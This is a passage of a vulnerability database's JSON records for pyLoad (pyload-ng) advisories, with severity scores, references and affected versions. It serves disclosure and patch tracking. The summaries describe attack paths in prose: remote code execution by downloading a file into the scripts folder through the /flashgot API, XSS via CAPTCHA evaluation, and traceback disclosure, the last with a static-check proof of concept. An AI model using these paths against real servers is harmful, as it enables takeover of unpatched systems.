"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": 
"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35464", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35464" }, { 
"reference_url": "https://www.cve.org/CVERecord?id=CVE-2026-33509", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": "https://www.cve.org/CVERecord?id=CVE-2026-33509" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35464", "GHSA-4744-96p5-mp2j" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9rb6-kh78-sbdf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93564?format=api", "vulnerability_id": "VCID-9u2h-q8gu-t7h4", "summary": "PyLoad vulnerable to unauthenticated traceback disclosure via global exception handler in WebUI\n### Summary\n`pyload-ng` WebUI returns full Python traceback details to clients on unhandled exceptions.\n\nBecause `/web/<path:filename>` is reachable without authentication and renders attacker-controlled template names, an unauthenticated user can reliably trigger a server exception (for example by requesting a non-existent template) and receive internal stack traces in the HTTP response.\n\n### Details\nThe issue is caused by the combination of:\n\n1. Unauthenticated template-render route:\n- `src/pyload/webui/app/blueprints/app_blueprint.py:32-36`\n - `@bp.route(\"/web/<path:filename>\", endpoint=\"web\")`\n - `data = render_template(filename)` with user-controlled `filename`\n - no `@login_required(...)` on this route\n\n2. Global exception handler exposes traceback to response:\n- `src/pyload/webui/app/handlers.py:14-27`\n - `tb = traceback.format_exc()`\n - `messages.extend(tb.split('\\n'))`\n - returned in rendered error page for all exceptions\n\n3. 
Error page renders all `messages`:\n- `src/pyload/webui/app/themes/modern/templates/base.html:217-219`\n - loops over `messages` and prints them in response HTML\n\nSo any unhandled exception can disclose internal implementation details (stack frames, source paths, exception metadata) to remote unauthenticated clients. \n\nThis is a core behavior issue in default WebUI error handling\n\n### PoC\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport re\nimport shutil\nimport tempfile\nimport traceback\nfrom pathlib import Path\n\n\nROOT = Path(__file__).resolve().parent / \"pyload\" / \"src\" / \"pyload\"\n\n\ndef read_text(rel: str) -> str:\n return (ROOT / rel).read_text(encoding=\"utf-8\")\n\n\ndef route_has_no_login_required(app_blueprint: str) -> bool:\n m = re.search(\n r'@bp\\\\.route\\\\(\"/web/<path:filename>\", endpoint=\"web\"\\\\)\\\\s*'\n r\"def render\\\\(filename\\\\):(?P<body>.*?)(?:\\\\n\\\\n@bp\\\\.route|\\\\Z)\",\n app_blueprint,\n re.DOTALL,\n )\n if not m:\n return False\n block_start = max(0, m.start() - 200)\n block = app_blueprint[block_start:m.end()]\n return \"@login_required(\" not in block\n\n\ndef main() -> None:\n workdir = Path(tempfile.mkdtemp(prefix=\"pyload-traceback-infoleak-\"))\n try:\n app_blueprint = read_text(\"webui/app/blueprints/app_blueprint.py\")\n handlers = read_text(\"webui/app/handlers.py\")\n base_template = read_text(\"webui/app/themes/modern/templates/base.html\")\n\n unauth_web_route = '/web/<path:filename>' in app_blueprint and route_has_no_login_required(app_blueprint)\n user_controlled_template_name = \"render_template(filename)\" in app_blueprint\n handler_uses_traceback = \"traceback.format_exc()\" in handlers\n handler_appends_trace = \"messages.extend(tb.split('\\\\n'))\" in handlers\n global_exception_handler = \"(Exception, handle_exception_error)\" in handlers\n template_renders_messages = \"{% for message in messages %}\" in base_template and \"{{message}}\" in 
base_template\n\n leaked_traceback_keyword = False\n leaked_exception_type = False\n try:\n raise RuntimeError(\"forced-poc-error\")\n except Exception:\n tb = traceback.format_exc()\n messages = [f\"Error 500: forced-poc-error\"]\n messages.extend(tb.split(\"\\\\n\"))\n joined = \"\\\\n\".join(messages)\n leaked_traceback_keyword = \"Traceback (most recent call last)\" in joined\n leaked_exception_type = \"RuntimeError: forced-poc-error\" in joined\n\n repro_success = all(\n [\n unauth_web_route,\n user_controlled_template_name,\n handler_uses_traceback,\n handler_appends_trace,\n global_exception_handler,\n template_renders_messages,\n leaked_traceback_keyword,\n leaked_exception_type,\n ]\n )\n\n print(\"unauth_web_route=\", unauth_web_route)\n print(\"user_controlled_template_name=\", user_controlled_template_name)\n print(\"handler_uses_traceback=\", handler_uses_traceback)\n print(\"handler_appends_trace=\", handler_appends_trace)\n print(\"global_exception_handler=\", global_exception_handler)\n print(\"template_renders_messages=\", template_renders_messages)\n print(\"leaked_traceback_keyword=\", leaked_traceback_keyword)\n print(\"leaked_exception_type=\", leaked_exception_type)\n print(\"traceback_infoleak_repro_success=\", repro_success)\n finally:\n shutil.rmtree(workdir, ignore_errors=True)\n print(\"cleanup_done=True\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nObserved result:\n```text\nunauth_web_route= True\nuser_controlled_template_name= True\nhandler_uses_traceback= True\nhandler_appends_trace= True\nglobal_exception_handler= True\ntemplate_renders_messages= True\nleaked_traceback_keyword= True\nleaked_exception_type= True\ntraceback_infoleak_repro_success= True\ncleanup_done=True\n```\n\n### Impact\n- Vulnerability type: Information disclosure (stack trace / internal path leakage).\n- Attack surface: unauthenticated WebUI request path.\n- Exposes internal error details that help attackers map application internals and improve exploit 
reliability for follow-on attacks.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44226", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20894", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44226" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:26:38Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44226", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44226" }, { "reference_url": "https://github.com/advisories/GHSA-c3gc-9pf2-84gg", "reference_id": "GHSA-c3gc-9pf2-84gg", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-c3gc-9pf2-84gg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", 
"purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-44226", "GHSA-c3gc-9pf2-84gg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9u2h-q8gu-t7h4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36908?format=api", "vulnerability_id": "VCID-a7fd-nsys-qub1", "summary": "pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for example when a download is finished. By downloading an executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in the `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. 
Version 0.5.0b3.dev87 fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47821", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01807", "scoring_system": "epss", "scoring_elements": "0.83188", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47821" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": 
"HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-28T17:19:04Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47821", "reference_id": "CVE-2024-47821", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47821" }, { "reference_url": "https://github.com/advisories/GHSA-w7hq-f2pj-c53g", "reference_id": "GHSA-w7hq-f2pj-c53g", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-w7hq-f2pj-c53g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48571?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev87", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": 
"VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87" } ], "aliases": [ "CVE-2024-47821", "GHSA-w7hq-f2pj-c53g", "PYSEC-2024-302" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a7fd-nsys-qub1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57660?format=api", "vulnerability_id": "VCID-bzxw-4smh-6yed", "summary": "pyLoad vulnerable to XSS through insecure CAPTCHA\nAn unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows **unauthenticated remote attackers** to execute **arbitrary code** in the client browser and potentially the backend server. 
Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system remote code execution (RCE).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53890", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0107", "scoring_system": "epss", "scoring_elements": "0.78103", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53890" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/" } ], "url": "https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546" }, { "reference_url": "https://github.com/pyload/pyload/pull/4586", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/" } ], "url": "https://github.com/pyload/pyload/pull/4586" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53890", 
"reference_id": "CVE-2025-53890", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53890" }, { "reference_url": "https://github.com/advisories/GHSA-8w3f-4r8f-pf53", "reference_id": "GHSA-8w3f-4r8f-pf53", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-8w3f-4r8f-pf53" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53", "reference_id": "GHSA-8w3f-4r8f-pf53", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/85763?format=api", "purl": "pkg:pypi/pyload-ng@0.20", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.20" } ], "aliases": [ "CVE-2025-53890", "GHSA-8w3f-4r8f-pf53" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bzxw-4smh-6yed" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37297?format=api", "vulnerability_id": "VCID-c4n8-pnbr-buce", "summary": "pyLoad is a free and open-source download manager written in Python. 
Prior to 0.5.0b3.dev98, the set_session_cookie_secure before_request handler in src/pyload/webui/app/__init__.py reads the X-Forwarded-Proto header from any HTTP request without validating that the request originates from a trusted proxy, then mutates the global Flask configuration SESSION_COOKIE_SECURE on every request. Because pyLoad uses the multi-threaded Cheroot WSGI server (request_queue_size=512), this creates a race condition where an attacker's request can influence the Secure flag on other users' session cookies — either downgrading cookie security behind a TLS proxy or causing a session denial-of-service on plain HTTP deployments. This vulnerability is fixed in 0.5.0b3.dev98.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40594", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01352", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40594" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-mp82-fmj6-f22v", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T18:01:27Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-mp82-fmj6-f22v" }, { "reference_url": 
"https://nvd.nist.gov/vuln/detail/CVE-2026-40594", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40594" }, { "reference_url": "https://github.com/advisories/GHSA-mp82-fmj6-f22v", "reference_id": "GHSA-mp82-fmj6-f22v", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-mp82-fmj6-f22v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38742?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev69", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-pgh8-2pmw-7ba7" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-tbkm-qa82-jkaw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": 
"VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzcg-gg18-9uhg" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev69" }, { "url": "http://public2.vulnerablecode.io/api/packages/50304?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev98", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev98" } ], "aliases": [ "CVE-2026-40594", "GHSA-mp82-fmj6-f22v", "PYSEC-2026-125" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c4n8-pnbr-buce" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47980?format=api", "vulnerability_id": "VCID-f95r-tk7k-gufe", "summary": "pyLoad CNL and captcha handlers allow Code Injection via unsanitized parameters\npyLoad web interface contained insufficient input validation in both the Captcha script endpoint and the Click'N'Load (CNL) Blueprint. This flaw allowed untrusted user input to be processed unsafely, which could be exploited by an attacker to inject arbitrary content into the web UI or manipulate request handling. 
The vulnerability could lead to client-side code execution (XSS) or other unintended behaviors when a malicious payload is submitted.\n\nUser-supplied parameters from HTTP requests were not adequately validated or sanitized before being passed into the application logic and response generation. This allowed crafted input to alter the expected execution flow.\nThe CNL (Click'N'Load) blueprint exposed unsafe handling of untrusted parameters in HTTP requests. The application did not consistently enforce input validation or encoding, making it possible for an attacker to craft malicious requests.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61773", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.21024", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61773" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/" } ], "url": "https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca" }, { "reference_url": "https://github.com/pyload/pyload/pull/4624", "reference_id": "", "reference_type": "", "scores": [ { "value": 
